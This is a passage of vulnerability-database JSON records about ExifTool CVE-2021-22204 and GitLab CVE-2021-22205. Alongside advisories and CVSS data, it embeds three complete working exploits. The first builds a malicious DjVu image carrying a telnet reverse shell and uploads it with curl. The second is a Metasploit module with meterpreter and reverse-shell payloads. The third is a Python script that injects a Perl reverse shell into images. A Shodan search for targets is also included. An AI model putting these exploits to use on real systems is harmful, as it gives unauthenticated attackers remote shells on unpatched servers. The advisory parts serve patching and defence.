"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-17T00:00:00", "type": "zdt", "title": "GitLab 13.10.2 - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-17T00:00:00", "id": 
"1337DAY-ID-37056", "href": "https://0day.today/exploit/description/37056", "sourceData": "# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)\n# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22\n# Exploit Author: Jacob Baines\n# Vendor Homepage: https://about.gitlab.com/\n# Software Link: https://gitlab.com/gitlab-org/gitlab\n# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8\n# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)\n# CVE : CVE-2021-22205\n# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/\n# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed\n\nCode execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.\n\n1. Generating the payload. 
This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.\n\necho -e\n\"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=\"\n| base64 -d > lol.jpg\necho -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg\necho -n\n\"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==\"\n| base64 -d >> lol.jpg\n\n2. Sending the payload. Any random endpoint will do.\n\ncurl -v -F '[email\u00a0protected]' http://10.0.0.7/$(openssl rand -hex 8)\n\n2a. Sample Output from the reverse shell:\n\n$ nc -lnvp 1270\nListening on [0.0.0.0] (family 0, port 1270)\nConnection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport\n34836)\nwhoami\ngit\nid\nuid=998(git) gid=998(git) groups=998(git)\n", "sourceHref": "https://0day.today/exploit/37056", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T23:55:50", "description": "This Metasploit module exploits an unauthenticated file upload and command injection vulnerability in GitLab Community Edition (CE) and Enterprise Edition (EE). The patched versions are 13.10.3, 13.9.6, and 13.8.8. 
Exploitation will result in command execution as the git user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-04T00:00:00", "type": "zdt", "title": "GitLab Unauthenticated Remote ExifTool Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-04T00:00:00", "id": "1337DAY-ID-36997", "href": "https://0day.today/exploit/description/36997", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'GitLab Unauthenticated Remote ExifTool Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated file upload and command\n injection vulnerability in GitLab Community Edition (CE) and\n Enterprise Edition (EE). 
The patched versions are 13.10.3, 13.9.6,\n and 13.8.8.\n\n Exploitation will result in command execution as the git user.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'William Bowling', # Vulnerability discovery and CVE-2021-22204 PoC\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-22205' ], # GitLab\n [ 'CVE', '2021-22204' ], # ExifTool\n [ 'URL', 'https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/' ],\n [ 'URL', 'https://hackerone.com/reports/1154542' ],\n [ 'URL', 'https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis' ],\n [ 'URL', 'https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/' ]\n ],\n 'DisclosureDate' => '2021-04-14',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'Payload' => {\n 'Space' => 290,\n 'DisableNops' => true,\n 'BadChars' => '#'\n },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_openssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'wget', 'lwprequest', 'curl', 'printf' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def upload_file(file_data, timeout = 20)\n random_filename = \"#{rand_text_alphanumeric(6..12)}.jpg\"\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n file_data,\n 'image/jpeg',\n 'binary',\n \"form-data; name=\\\"file\\\"; 
filename=\\\"#{random_filename}\\\"\"\n )\n\n random_uri = normalize_uri(target_uri.path, rand_text_alphanumeric(6..12))\n print_status(\"Uploading #{random_filename} to #{random_uri}\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => random_uri,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, timeout)\n end\n\n def check\n # Checks if the instance is a GitLab install by looking for the\n # 'About GitLab' footer or a password redirect. If that's successful\n # a bogus jpg image is uploaded to a bogus URI. The patched versions\n # should never send the bad image to ExifTool, resulting in a 404.\n # The unpatched versions should feed the image to the vulnerable\n # ExifTool, resulting in a 422 error message.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/users/sign_in')\n })\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # handle two cases. 
First a normal install will respond with HTTP 200.\n # Second, if the root password hasn't been set yet then this will\n # redirect to the password reset page.\n unless (res.code == 200 && res.body.include?('>About GitLab<')) ||\n (res.code == 302 && res.body.include?('/users/password/edit?reset_password_token'))\n return CheckCode::Safe('Not a GitLab web interface')\n end\n\n res = upload_file(rand_text_alphanumeric(6..32))\n unless res\n return CheckCode::Detected('The target did not respond to the upload request.')\n end\n\n case res.code\n when 422\n if res.body.include?('The change you requested was rejected.')\n return CheckCode::Vulnerable('The error response indicates ExifTool was executed.')\n end\n when 404\n if res.body.include?('The page could not be found')\n return CheckCode::Safe('The error response indicates ExifTool was not run.')\n end\n end\n\n return CheckCode::Detected\n end\n\n def execute_command(cmd, _opts = {})\n # printf needs all '\\' to be double escaped due to ExifTool parsing\n if cmd.start_with?('printf ')\n cmd = cmd.gsub('\\\\', '\\\\\\\\\\\\')\n end\n\n # header and trailer are taken from William Bowling's echo_vakzz.jpg from their original h1 disclosure.\n # The 'cmd' variable is sandwiched in a qx## function.\n payload_header = \"AT&TFORM\\x00\\x00\\x03\\xAFDJVMDIRM\\x00\\x00\\x00.\\x81\\x00\\x02\\x00\\x00\\x00F\\x00\\x00\"\\\n \"\\x00\\xAC\\xFF\\xFF\\xDE\\xBF\\x99 !\\xC8\\x91N\\xEB\\f\\a\\x1F\\xD2\\xDA\\x88\\xE8k\\xE6D\\x0F,q\\x02\\xEEI\\xD3n\"\\\n \"\\x95\\xBD\\xA2\\xC3\\\"?FORM\\x00\\x00\\x00^DJVUINFO\\x00\\x00\\x00\\n\\x00\\b\\x00\\b\\x18\\x00d\\x00\\x16\\x00IN\"\\\n \"CL\\x00\\x00\\x00\\x0Fshared_anno.iff\\x00BG44\\x00\\x00\\x00\\x11\\x00J\\x01\\x02\\x00\\b\\x00\\b\\x8A\\xE6\\xE1\"\\\n \"\\xB17\\xD9\\x7F*\\x89\\x00BG44\\x00\\x00\\x00\\x04\\x01\\x0F\\xF9\\x9FBG44\\x00\\x00\\x00\\x02\\x02\\nFORM\\x00\\x00\"\\\n \"\\x03\\aDJVIANTa\\x00\\x00\\x01P(metadata\\n\\t(Copyright \\\"\\\\\\n\\\" . qx#\"\n payload_trailer = \"# . 
\\\\\\x0a\\\" b \\\") )\" + (' ' * 421)\n\n res = upload_file(payload_header + cmd + payload_trailer, 5)\n\n # Successful exploitation can result in no response (connection being held open by a reverse shell)\n # or, if the command executes immediately, a response with a 422.\n if res && res.code != 422\n fail_with(Failure::UnexpectedReply, \"The target replied with HTTP status #{res.code}. No reply was expected.\")\n end\n\n print_good('Exploit successfully executed.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # payload is truncated by exiftool after 290 bytes. Because we need to\n # expand the printf flavor by a potential factor of 2, halve the linemax.\n execute_cmdstager(linemax: 144)\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36997", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-01-26T15:21:33", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n * Ubuntu 18.04 LTS\n\n## Packages\n\n * libimage-exiftool-perl \\- library and program to read and write meta information in multime\n\nIt was discovered that ExifTool did not properly sanitize user data for the \nDjVu file format. 
An attacker could use this vulnerability to cause a DoS or \npossibly execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "ubuntu", "title": "ExifTool vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-06-10T00:00:00", "id": "USN-4987-1", "href": "https://ubuntu.com/security/notices/USN-4987-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T15:16:12", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n\n## Packages\n\n * libimage-exiftool-perl \\- library and program to read and write meta information in multime\n\nUSN-4987-1 fixed a vulnerability in ExifTool. This update provides \nthe corresponding update for Ubuntu 16.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that ExifTool did not properly sanitize user data for the \nDjVu file format. 
An attacker could use this vulnerability to cause a DoS or \npossibly execute arbitrary code.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "ubuntu", "title": "ExifTool vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-02-08T00:00:00", "id": "USN-4987-2", "href": "https://ubuntu.com/security/notices/USN-4987-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-10-31T11:09:27", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22204", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2021-05-04T00:00:00", "id": "AKB:13A3A278-4B9C-4E8F-A4FE-052E8C0204B2", "href": "https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-16T23:12:43", "description": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at November 01, 2021 2:33pm UTC reported:\n\nCVE-2021-22205 was originally disclosed as an authenticated vulnerability. However, deeper inspection shows that the vulnerability can be exploited without authentication and is trivial to weaponize. 
For full analysis see the [Rapid7 Analysis](<https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22205", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-11-01T00:00:00", "id": "AKB:E9596BCB-BC29-4F41-9350-220EBD59D69D", "href": "https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:08:05", "description": "Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", 
"baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-23T18:15:00", "type": "cve", "title": "CVE-2021-22204", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-27T16:29:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:32", "cpe:/o:fedoraproject:fedora:34", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-22204", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22204", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-03T11:59:51", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "exploitdb", 
"title": "ExifTool 12.23 - Arbitrary Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-22204", "CVE-2021-22204"], "modified": "2022-05-11T00:00:00", "id": "EDB-ID:50911", "href": "https://www.exploit-db.com/exploits/50911", "sourceData": "# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution\r\n# Date: 04/30/2022\r\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)\r\n# Vendor Homepage: https://exiftool.org/\r\n# Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip\r\n# Version: 7.44-12.23\r\n# Tested on: ExifTool 12.23 (Debian)\r\n# CVE: CVE-2021-22204\r\n# Source: https://github.com/UNICORDev/exploit-CVE-2021-22204\r\n# Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image\r\n\r\n#!/usr/bin/env python3\r\n\r\n# Imports\r\nimport base64\r\nimport os\r\nimport subprocess\r\nimport sys\r\n\r\n# Class for colors\r\nclass color:\r\n red = '\\033[91m'\r\n gold = '\\033[93m'\r\n blue = '\\033[36m'\r\n green = '\\033[92m'\r\n no = '\\033[0m'\r\n\r\n# Print UNICORD ASCII Art\r\ndef UNICORD_ASCII():\r\n print(rf\"\"\"\r\n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}\r\n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no}\r\n{color.red} |/| `--. 
{color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}\r\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no}\r\n \"\"\")\r\n\r\n# Print exploit help menu\r\ndef help():\r\n print(r\"\"\"UNICORD Exploit for CVE-2021-22204\r\n\r\nUsage:\r\n python3 exploit-CVE-2021-22204.py -c <command>\r\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>\r\n python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]\r\n python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]\r\n python3 exploit-CVE-2021-22204.py -h\r\n\r\nOptions:\r\n -c Custom command mode. Provide command to execute.\r\n -s Reverse shell mode. Provide local IP and port.\r\n -i Path to custom JPEG image. (Optional)\r\n -h Show this help menu.\r\n\"\"\")\r\n\r\n# Run the exploit\r\ndef exploit(command):\r\n\r\n UNICORD_ASCII()\r\n\r\n # Create perl payload\r\n payload = \"(metadata \\\"\\c${\"\r\n payload += command\r\n payload += \"};\\\")\"\r\n\r\n print(f\"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}\")\r\n print(f\"{color.red}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\")\r\n\r\n # Write payload to file\r\n payloadFile = open('payload','w')\r\n payloadFile.write(payload)\r\n payloadFile.close()\r\n\r\n # Bzz compress file\r\n subprocess.run(['bzz', 'payload', 'payload.bzz'])\r\n\r\n # Run djvumake\r\n subprocess.run(['djvumake', 'exploit.djvu', \"INFO=1,1\", 'BGjp=/dev/null', 'ANTz=payload.bzz'])\r\n\r\n if '-i' in sys.argv:\r\n imagePath = sys.argv[sys.argv.index('-i') + 1]\r\n subprocess.run(['cp',f'{imagePath}','./image.jpg','-n'])\r\n\r\n else:\r\n # Smallest possible JPEG\r\n image = b\"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=\"\r\n\r\n # Write smallest possible JPEG 
image to file\r\n with open(\"image.jpg\", \"wb\") as img:\r\n img.write(base64.decodebytes(image))\r\n\r\n # Write exiftool config to file\r\n config = (r\"\"\"\r\n %Image::ExifTool::UserDefined = (\r\n 'Image::ExifTool::Exif::Main' => {\r\n 0xc51b => {\r\n Name => 'HasselbladExif',\r\n Writable => 'string',\r\n WriteGroup => 'IFD0',\r\n },\r\n },\r\n );\r\n 1; #end\r\n \"\"\")\r\n configFile = open('exiftool.config','w')\r\n configFile.write(config)\r\n configFile.close()\r\n\r\n # Exiftool config for output image\r\n subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q'])\r\n\r\n # Delete leftover files\r\n os.remove(\"payload\")\r\n os.remove(\"payload.bzz\")\r\n os.remove(\"exploit.djvu\")\r\n os.remove(\"exiftool.config\")\r\n\r\n # Print results\r\n print(f\"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\\n\")\r\n\r\n exit()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n args = ['-h','-c','-s','-i']\r\n\r\n if args[0] in sys.argv:\r\n help()\r\n\r\n elif args[1] in sys.argv and not args[2] in sys.argv:\r\n exec = sys.argv[sys.argv.index(args[1]) + 1]\r\n command = f\"system(\\'{exec}\\')\"\r\n exploit(command)\r\n\r\n elif args[2] in sys.argv and not args[1] in sys.argv:\r\n localIP = sys.argv[sys.argv.index(args[2]) + 1]\r\n localPort = sys.argv[sys.argv.index(args[2]) + 2]\r\n command = f\"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};\"\r\n exploit(command)\r\n\r\n else:\r\n help()", "sourceHref": "https://www.exploit-db.com/download/50911", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:03:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
